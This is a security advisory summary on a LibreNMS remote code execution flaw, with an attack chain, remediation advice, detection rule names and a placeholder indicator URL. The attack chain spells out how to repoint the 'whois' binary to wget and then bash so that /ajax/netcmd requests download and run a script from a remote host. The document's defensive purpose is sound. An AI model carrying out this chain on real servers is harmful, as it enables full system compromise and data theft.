LibreNMS Remote Code Execution via Arbitrary File Write
An authenticated administrator can achieve remote code execution on LibreNMS by modifying the binary path settings for built-in network tools and bypassing an input filter to execute arbitrary commands.
LibreNMS is vulnerable to remote code execution (RCE) due to insufficient validation of binary paths for network diagnostic tools. This flaw, affecting versions prior to 26.3.0, allows an authenticated administrator to modify the 'whois' binary path setting. By first setting the path to wget and then to bash, an attacker can download and execute a malicious script hosted on a remote server. The vulnerability resides in the /ajax/netcmd endpoint, which is inadequately filtered, allowing bypass and subsequent execution of arbitrary commands. This poses a significant risk, potentially leading to complete system compromise and unauthorized access.
Attack Chain
- Attacker logs into LibreNMS with administrator credentials.
- Attacker navigates to the Global Settings -> External -> Binary Locations page in the LibreNMS web interface.
- Attacker changes the 'whois' binary path to
/usr/bin/wget. - Attacker sends a request to
GET /ajax/netcmd?cmd=whois&query={remote http server's ip address}/malicious.shto download the malicious script usingwget. - Attacker changes the 'whois' binary path to
/bin/bash. - Attacker sends a request to
GET /ajax/netcmd?cmd=whois&query=malicious.shto execute the downloaded script usingbash. - The malicious script executes on the LibreNMS server.
Impact
Successful exploitation of this vulnerability grants the attacker Remote Code Execution (RCE). This can lead to a full system compromise, allowing the attacker to exfiltrate sensitive data, install malware, or pivot to other systems within the network. The original advisory does not specify victim counts or targeted sectors, but the potential impact is severe given the privileged access achieved.
Recommendation
- Monitor web server logs for requests to
/ajax/netcmdwith suspicious query parameters containing shell commands or script extensions (e.g.,.sh,.ps1). See rule: "Detect Suspicious Netcmd Usage". - Implement stricter validation and sanitization of user-supplied input for binary paths in LibreNMS settings.
- Restrict access to the LibreNMS administrative interface to trusted users and networks.
- Upgrade LibreNMS to version 26.3.0 or later to patch this vulnerability.
Detection coverage 2
Detect Suspicious Netcmd Usage
highDetects potential RCE attempts by monitoring usage of the /ajax/netcmd endpoint with suspicious commands.
Detect Wget Usage from Unusual Locations
highDetects wget being used after the whois binary path has been modified.
Detection queries are available on the platform. Get full rules →
Indicators of compromise
1
url
| Type | Value |
|---|---|
| url | http://{remote http server's ip address}/malicious.sh |